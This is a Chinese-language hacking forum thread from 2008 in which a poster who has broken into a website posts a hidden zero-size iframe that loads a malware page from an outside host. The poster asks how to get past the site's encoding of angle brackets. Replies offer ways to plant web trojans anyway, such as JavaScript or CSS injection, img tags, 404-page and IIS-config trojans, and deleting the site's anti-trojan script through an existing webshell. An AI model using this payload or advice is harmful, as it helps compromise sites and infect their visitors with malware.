日到一站...挂马成功

<iframe width=0 height=0 src=http://www.xxx.com/m.htm></iframe>


挂上后查看源文件 被过滤成了..

&#60;iframe width=0 height=0 src=http://www.xxx.com/m.htm&#62;&#60;/iframe&#62


<>  这2个符号被过滤.... 各位牛提供下解决办法...

[ 本帖最后由 绝情啊东 于 2008-4-22 18:22 编辑 ]

即使不过滤掉,中马的机率有多少?现在大多都打了补丁了?你的马能穿SP2不能?能的话发出来分享下

我很菜，只能给你点建议。
1：你去看看他网页中用到<>的地方怎么设置的，网页中应该有的吧。。<body>...........</body>等等，他怎么写的你也怎么写。。。
2：用CSS自定义样式。。把它那个给改了。具体你可以去看看CSS的东东。。有两篇文章很经典你可以去看看。《一行代码解决iframe挂马（包含服务器端注入、客户端ARP注入等）》，《二行代码解决全部网页木马(含iframe/script木马）》，还有vbs小铺的那个《关于<<二行代码解决全部网页木马>>的文章》。

换一种挂马方式
如script 调用js挂，css挂马等。
如果有系统权限，弄个404挂马很不错的。

用js就可以了 现在挂马常用都是js 框架 淘汰了

受不了。一个个答非所问，明显过滤了"<"了，难道JS挂马就不用这个"<"了吗！楼主可以用img标签。
再说现在没有好网马的话就不用挂了，老是那些垃圾马没什么意思，中不了还被别人骂，有什么意思哦，呵呵

本版规则
给议题提出者：
01 本版的原创议题禁止讨论页面挂马、收信刷库、偷盗隐私、软绑架等明显违反法律和社会道德的话题。

..我晕..难道JS挂马就不用<>了么??  ..我汗..看清楚题目在回答啊..OK？

你这是XSS 还是直接修改原文件挂马啊?

XSS的话  就只能看看他标签地方 能不能利用了  不然没办法
直接改原文件的话  这种情况没见过~~~

不是XSS................

你在本地上传个带<iframe>的文件试下  看他过滤了没

要是没过滤把他首页代码下下来  在本地改完了 在传上去试下

貌似所有的网页中都要用到：<>符号吧。
你看你挂马页面中其它语句是怎么编写的，你就按照它的格式来，应该就没有问题了！
如果还不行，可能是它调用了某个“防挂”脚本，你既然已经有webshell了，那就找到那个脚本，删除掉.就ok了！
再者，如果嫌上面两种办法麻烦，就直接改别的挂马方式，比如前面人提到的js等等！

     ...................

用这个script  标签试试吧

第一：看看文件里有调用js的地方没有
直接修改他的js文件
第二：404挂马
第三：iis配置文件挂马